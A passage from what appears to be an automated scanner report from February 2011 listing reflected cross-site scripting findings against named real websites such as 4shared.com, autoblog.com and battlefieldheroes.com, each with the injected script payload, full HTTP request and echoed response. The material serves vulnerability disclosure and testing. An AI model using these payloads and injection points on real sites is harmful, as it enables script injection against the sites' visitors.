Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Content-Length: 2263
Connection: close
Content-Type: text/html

<html><head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<link rel="Shortcut Icon" href="img/favicon.ico" type="image/x-icon" />
<title>You Are Today's Lucky Winner</title
...[SNIP]...
<iframe src='1-frame.php?subid=154&sid=&c=668af\'><script>alert(1)</script>51f185bb0fc&tt=' width="100%" height="900" scrolling="no" frameborder="0">
...[SNIP]...

3.9. http://weekly-prizes.com/1.php [subid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://weekly-prizes.com
Path:   /1.php

Issue detail

The value of the subid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 17f81'><script>alert(1)</script>80c5a12b590 was submitted in the subid parameter. This input was echoed as 17f81\'><script>alert(1)</script>80c5a12b590 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1.php?c=us&subid=17f81'><script>alert(1)</script>80c5a12b590 HTTP/1.1
Host: weekly-prizes.com
Proxy-Connection: keep-alive
Referer: http://zjmps.com/click/?a=154&o=518&c1=js_sound2909d\
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:21:05 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Content-Length: 2303
Connection: close
Content-Type: text/html

<html><head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<link rel="Shortcut Icon" href="img/favicon.ico" type="image/x-icon" />
<title>You Are Today's Lucky Winner</title
...[SNIP]...
<iframe src='1-frame.php?subid=17f81\'><script>alert(1)</script>80c5a12b590&sid=&c=us&tt=' width="100%" height="900" scrolling="no" frameborder="0">
...[SNIP]...

3.10. http://weekly-prizes.com/1.php [subid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://weekly-prizes.com
Path:   /1.php

Issue detail

The value of the subid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ea28"><script>alert(1)</script>a9d824969dc was submitted in the subid parameter. This input was echoed as 8ea28\"><script>alert(1)</script>a9d824969dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1.php?c=us&subid=1548ea28"><script>alert(1)</script>a9d824969dc HTTP/1.1
Host: weekly-prizes.com
Proxy-Connection: keep-alive
Referer: http://zjmps.com/click/?a=154&o=518&c1=js_sound2909d\
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:21:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Content-Length: 2309
Connection: close
Content-Type: text/html

<html><head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<link rel="Shortcut Icon" href="img/favicon.ico" type="image/x-icon" />
<title>You Are Today's Lucky Winner</title
...[SNIP]...
<a href="1-frame.php?subid=1548ea28\"><script>alert(1)</script>a9d824969dc">
...[SNIP]...

3.11. http://www.4shared.com/signUpBox.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /signUpBox.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da0f6'-alert(1)-'1b9de5e53fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signUpBox.jspda0f6'-alert(1)-'1b9de5e53fb HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /signUpBox.jspda0f6'-alert(1)-'1b9de5e53fb
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A75CCE24934C861B753A296F497240D2.dc285; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 28 Feb 2011 13:34:19 GMT
Connection: close
Content-Length: 36117


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
f loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/signUpBox.jspda0f6'-alert(1)-'1b9de5e53fb',
remember : false


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

3.12. http://www.4shared.com/signUpBox.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /signUpBox.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae457"-alert(1)-"17d23f8f0e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signUpBox.jspae457"-alert(1)-"17d23f8f0e3 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /signUpBox.jspae457&quot;-alert(1)-&quot;17d23f8f0e3
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6168AB99FC4AE226E1202623FE50F782.dc285; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 28 Feb 2011 13:34:18 GMT
Connection: close
Content-Length: 36128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/signUpBox.jspae457"-alert(1)-"17d23f8f0e3";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.13. http://www.aiglons.com/fr/offre.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aiglons.com
Path:   /fr/offre.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0caa"><script>alert(1)</script>72dba670e3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/offre.php?c0caa"><script>alert(1)</script>72dba670e3e=1 HTTP/1.1
Host: www.aiglons.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:34:34 GMT
Server: Apache
Set-Cookie: PHPSESSID=764637faqmhd4qt2eojnek5me2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 18142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<a href="http://www.aiglons.com/en/offre.php?c0caa"><script>alert(1)</script>72dba670e3e=1">
...[SNIP]...

3.14. http://www.aisledash.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aisledash.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2abaa"><script>alert(1)</script>20ed5e65567 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2abaa"><script>alert(1)</script>20ed5e65567=1 HTTP/1.1
Host: www.aisledash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:34:19 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999952
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 50385

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://www.aisledash.com/?2abaa"><script>alert(1)</script>20ed5e65567=1" />
...[SNIP]...

3.15. http://www.aolhealth.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aolhealth.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6aaf"><script>alert(1)</script>7f321345f2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c6aaf"><script>alert(1)</script>7f321345f2e=1 HTTP/1.1
Host: www.aolhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:34:19 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999904
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 53030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.aolhealth.com/?c6aaf"><script>alert(1)</script>7f321345f2e=1">
...[SNIP]...

3.16. http://www.atr.org/obamas-fy-budgetbr-taxes-more-a5844 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.atr.org
Path:   /obamas-fy-budgetbr-taxes-more-a5844

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58a98'-alert(1)-'8ec15fce1e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /obamas-fy-budgetbr-taxes-more-a5844?58a98'-alert(1)-'8ec15fce1e2=1 HTTP/1.1
Host: www.atr.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:34:23 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: show_popup=1; expires=Wed, 30-Apr-2014 23:21:03 GMT
Set-Cookie: PHPSESSID=s0uir5ct53obaj6a07u4folde4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="verify-v1" cont
...[SNIP]...

var disqus_shortname = 'atrorg'; // required: replace example with your forum shortname
   var disqus_identifier = 'a5844';
   var disqus_url = 'http://www.atr.org/obamas-fy-budgetbr-taxes-more-a5844?58a98'-alert(1)-'8ec15fce1e2=1';

// The following are highly recommended additional parameters. Remove the slashes in front to use.
// var disqus_identifier = 'unique_dynamic_id_1234';
// var disqus_url = 'http://exa
...[SNIP]...

3.17. http://www.au2m8.com/v/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.au2m8.com
Path:   /v/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e255a"><script>alert(1)</script>6cc3106081f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v/?e255a"><script>alert(1)</script>6cc3106081f=1 HTTP/1.1
Host: www.au2m8.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=NQJKKYS192.168.100.218CKOWJ; path=/
Date: Mon, 28 Feb 2011 13:34:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Cache-Control: max-age=0, no-cache, must-revalidate, proxy-revalidate, s-maxage=0
Expires: Mon, 28 Feb 2011 13:34:22 GMT
Last-Modified: Mon, 28 Feb 2011 13:34:22 GMT
Set-Cookie: countryID=us; expires=Tue, 28-Feb-2012 13:34:22 GMT; path=/; domain=.au2m8.com
Set-Cookie: bpl1298903662=1298900062; expires=Mon, 28-Feb-2011 14:34:22 GMT; path=/; domain=.au2m8.com
Set-Cookie: videoID=expired; expires=Mon, 28-Feb-2011 14:34:22 GMT; path=/; domain=.au2m8.com
Set-Cookie: auto=expired; expires=Mon, 28-Feb-2011 14:34:22 GMT; path=/; domain=.au2m8.com
Set-Cookie: playlist=deleted; expires=Sun, 28-Feb-2010 13:34:21 GMT; path=/; domain=.au2m8.com
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13234

...<html>
    <head>
    <meat http-equiv="Expires" CONTENT="Mon, 28 Feb 2011 13:34:22 GMT">
    <title>Le Roomster De Gonzague - D..fi n..6</title>
    <style type='text/css'>
   
...[SNIP]...
<a href="/v/?e255a"><script>alert(1)</script>6cc3106081f=1&auto=1&yuhn=3547&videoID=3603" onclick="return playVideo('contentBox','/v/?e255a">
...[SNIP]...

3.18. http://www.autoblog.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autoblog.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39be0"><script>alert(1)</script>44f12833cdf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?39be0"><script>alert(1)</script>44f12833cdf=1 HTTP/1.1
Host: www.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:34:22 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Keep-Alive: timeout=5, max=999991
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 94720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.autoblog.com/?39be0"><script>alert(1)</script>44f12833cdf=1"/>
...[SNIP]...

3.19. http://www.autoblog.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autoblog.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ef27"-alert(1)-"0ec72329a14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?1ef27"-alert(1)-"0ec72329a14=1 HTTP/1.1
Host: www.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:34:22 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Keep-Alive: timeout=5, max=999998
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 94646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
5.channel="wb.autoblog";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,autoblog.com";
s_265.mmxgo = true;
s_265.prop1="Autoblog";
s_265.prop2="Home";
s_265.prop12="http://www.autoblog.com/?1ef27"-alert(1)-"0ec72329a14=1";
s_265.prop16="Autoblog &mdash; We Obsessively Cover The Auto Industry";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="dtc";
s_265.prop22="8";
s_265.prop23="";


...[SNIP]...

3.20. http://www.babypronto.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.babypronto.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 984d6'><script>alert(1)</script>05fe1b28849 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?984d6'><script>alert(1)</script>05fe1b28849=1 HTTP/1.1
Host: www.babypronto.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:34:26 GMT
Server: Apache/2.2.4 (Fedora)
Set-Cookie: JSESSIONID=A8E1897C9D42DB82BBD15406620451C1; Path=/
Set-Cookie: SESSIONID=-569663744; Domain=.babypronto.com; Path=/
Set-Cookie: abt=ProntoV3_5_6-1.171-cellNum_5; Domain=.babypronto.com; Expires=Wed, 30-Mar-2011 13:34:26 GMT; Path=/
Set-Cookie: entryPoint=direct; Domain=.babypronto.com; Path=/
Set-Cookie: M_ID=b606989-12e6c6e1692--1f5f; Domain=.babypronto.com; Expires=Wed, 27-Feb-2013 13:34:26 GMT; Path=/
Set-Cookie: V_ID=b606989-12e6c6e1692--1f5e; Domain=.babypronto.com; Path=/
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
_eep-Alive: timeout=15
_onnection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Via: CN-5000
Connection: close
Content-Length: 128906


            <!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN
...[SNIP]...
<meta content='http://www.babypronto.com/?984d6'><script>alert(1)</script>05fe1b28849=1' property='og:url'/>
...[SNIP]...

3.21. http://www.battlefieldheroes.com/frontpage/landingPage [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.battlefieldheroes.com
Path:   /frontpage/landingPage

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3e6c"><script>alert(1)</script>bcc32bb5b0a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /frontpagee3e6c"><script>alert(1)</script>bcc32bb5b0a/landingPage HTTP/1.1
Host: www.battlefieldheroes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:34:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: magma=227bp1lpr4dkecbig98lorjme1; path=/
Set-Cookie: language=en; expires=Tue, 28-Feb-2012 13:34:28 GMT; path=/
Vary: Accept-Encoding
X-Orig-Server: (null)
Keep-Alive: timeout=2, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 12302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="
...[SNIP]...
<a
        href="/en/frontpagee3e6c"><script>alert(1)</script>bcc32bb5b0a/landingPage">
...[SNIP]...

3.22. http://www.battlefieldheroes.com/frontpage/landingPage [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.battlefieldheroes.com
Path:   /frontpage/landingPage

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a048"><script>alert(1)</script>d00a8847f19 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /frontpage/landingPage7a048"><script>alert(1)</script>d00a8847f19 HTTP/1.1
Host: www.battlefieldheroes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:34:30 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: magma=oa7c3arfgsc0253pjl41f59m24; path=/
Set-Cookie: language=en; expires=Tue, 28-Feb-2012 13:34:30 GMT; path=/
Vary: Accept-Encoding
X-Orig-Server: (null)
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 12302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="
...[SNIP]...
<a
        href="/en/frontpage/landingPage7a048"><script>alert(1)</script>d00a8847f19">
...[SNIP]...

3.23. http://www.battlefieldheroes.com/frontpage/landingPage [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.battlefieldheroes.com
Path:   /frontpage/landingPage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29a91"><script>alert(1)</script>57ce7fb2168 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /frontpage/landingPage?29a91"><script>alert(1)</script>57ce7fb2168=1 HTTP/1.1
Host: www.battlefieldheroes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:34:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: magma=2hh7rcjidvhm8j6cctapceclv5; path=/
Set-Cookie: language=en; expires=Tue, 28-Feb-2012 13:34:25 GMT; path=/
Set-Cookie: hasVisitedLandingPage=1; expires=Sun, 22-Sep-2109 13:34:25 GMT; path=/
Vary: Accept-Encoding
X-Orig-Server: (null)
Keep-Alive: timeout=2, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<a
        href="/en/frontpage/landingPage?29a91"><script>alert(1)</script>57ce7fb2168=1">
...[SNIP]...

3.24. http://www.bendbulletin.com/apps/pbcs.dll/article [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bendbulletin.com
Path:   /apps/pbcs.dll/article

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a970"><a>2486dda6de9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /apps/pbcs.dll/article?9a970"><a>2486dda6de9=1 HTTP/1.1
Host: www.bendbulletin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Content-Length: 32011
Content-Type: text/html; charset=Iso-8859-1
Last-Modified: Mon, 28 Feb 2011 13:35:11 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: PBCSSESSIONID=473419620110152; path=/
X-Passed-To: S260608AT1VW732, URL Rewrite on site N/A (2011-02-28 08:35:09:918)
X-Handled-By: S260608AT1VW732, Rewrite on site N/A
X-Actual-URL: S260608AT1VW732, (/apps/pbcs.dll/article?9a970"><a>2486dda6de9=1)
X-Passed-To-DLL: S260608AT1VW732, (2011-02-28 08:35:09:918)
X-Passed-To-BeforeDispatch: S260608AT1VW732, on site BB (2011-02-28 08:35:09:918)
X-Returned-From-BeforeDispatch: S260608AT1VW732, on site BB (2011-02-28 08:35:10:371)
X-Passed-To-PostProcessResponse: S260608AT1VW732, on site BB (2011-02-28 08:35:15:199)
X-Returned-From-PostProcessResponse: S260608AT1VW732, on site BB (2011-02-28 08:35:15:199)
X-Returned-From-DLL: S260608AT1VW732 (2011-02-28 08:35:15:199)
X-Returned-From: S260608AT1VW732(2011-02-28 08:35:15:199)
Date: Mon, 28 Feb 2011 13:35:14 GMT
X-Cache: MISS from sxsquid03
X-Cache-Lookup: MISS from sxsquid03:80
Via: 1.0 sxsquid03 (squid/3.0.STABLE18)
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lan
...[SNIP]...
<a href="/apps/pbcs.dll/article?9a970"><a>2486dda6de9=1&amp;template=print">
...[SNIP]...

3.25. http://www.bizfind.us/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bizfind.us
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 800c2"><script>alert(1)</script>5405092905c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?800c2"><script>alert(1)</script>5405092905c=1 HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/15/182221'/abc-development-inc/chicago.aspx/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
